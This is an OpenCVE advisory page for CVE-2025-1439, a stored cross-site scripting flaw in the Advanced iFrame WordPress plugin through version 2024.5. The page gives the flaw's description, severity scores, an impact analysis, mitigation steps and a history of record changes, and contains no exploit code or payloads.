Description
The Advanced iFrame plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'advanced_iframe' shortcode in all versions up to, and including, 2024.5 due to insufficient input sanitization and output escaping on user supplied attributes through the 'src' attribute when the src supplied returns a header with an injected value . This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Published: 2025-03-26
Score: 6.4 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Stored Cross‑Site Scripting (XSS)
Action: Apply Patch
AI Analysis

Impact

The Advanced iFrame plugin for WordPress allows an authenticated contributor or higher user to inject arbitrary scripts into the "src" attribute of its shortcode. Because the plugin fails to properly sanitize or escape values returned from the host header, the malicious content is stored and rendered within page responses, causing the script to execute in the browsers of any user who views the affected page. This stored XSS can be used for session hijacking, phishing, or defacement, and results in a loss of confidentiality and integrity of user data.

Affected Systems

All installations of Advanced iFrame, a WordPress plugin developed by mdempfle, with versions up to and including 2024.5 are affected. The vulnerability is present whenever the plugin’s shortcode is used in content posted by users who have contributor privileges or greater.

Risk and Exploitability

The Common Vulnerability Scoring System score of 6.4 indicates a moderate severity. The EPSS score of less than 1 % suggests a low probability of exploitation at this time, and the vulnerability is not currently listed in the CISA KEV catalog. The attack requires the attacker to be authenticated with contributor-level access or higher and to supply a malicious host header that is reflected in the src attribute. Because the flaw is stored, the malicious script persists in the stored post content and will be delivered automatically to any visitor of that page, making the attack practical when the plugin is actively in use.

Generated by OpenCVE AI on April 22, 2026 at 01:47 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade the Advanced iFrame plugin to a version newer than 2024.5, which contains the input sanitization fix.
  • Limit contributor or lower role access to only trusted users, or remove contributor privileges if the shortcode is not required for that user group.
  • Re‑validate existing posts that use the advanced_iframe shortcode to ensure no malicious src attributes remain and strip any suspicious content.
  • Consider disabling the Advanced iFrame shortcode in the plugin settings if the functionality is not needed, or restrict its usage to administrators only.

Generated by OpenCVE AI on April 22, 2026 at 01:47 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
EUVD EUVD EUVD-2025-8128 The Advanced iFrame plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'advanced_iframe' shortcode in all versions up to, and including, 2024.5 due to insufficient input sanitization and output escaping on user supplied attributes through the 'src' attribute when the src supplied returns a header with an injected value . This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
History

Tue, 15 Jul 2025 13:45:00 +0000

Type Values Removed Values Added
Metrics epss

{'score': 0.00038}

 epss

{'score': 0.00034}

Mon, 14 Jul 2025 16:45:00 +0000

Type Values Removed Values Added
First Time appeared Tinywebgallery
Tinywebgallery advanced Iframe
CPEs cpe:2.3:a:tinywebgallery:advanced_iframe:*:*:*:*:*:wordpress:*:*
Vendors & Products Tinywebgallery
Tinywebgallery advanced Iframe

Wed, 26 Mar 2025 14:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Wed, 26 Mar 2025 09:45:00 +0000

Type Values Removed Values Added
Description The Advanced iFrame plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'advanced_iframe' shortcode in all versions up to, and including, 2024.5 due to insufficient input sanitization and output escaping on user supplied attributes through the 'src' attribute when the src supplied returns a header with an injected value . This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Title Advanced iFrame <= 2024.5 - Authenticated (Contributor+) Stored Cross-Site Scripting via Host Header
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 6.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N'}

Subscriptions

Tinywebgallery Advanced Iframe
Wordpress Wordpress
cve-icon MITRE

Status: PUBLISHED

Assigner: Wordfence

Published:

Updated: 2026-04-08T16:55:13.699Z

Reserved: 2025-02-18T15:21:12.917Z

Link: CVE-2025-1439

cve-icon Vulnrichment

Updated: 2025-03-26T13:41:16.069Z

cve-icon NVD

Status : Analyzed

Published: 2025-03-26T10:15:15.093

Modified: 2025-07-14T16:38:27.070

Link: CVE-2025-1439

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-22T02:00:05Z

Weaknesses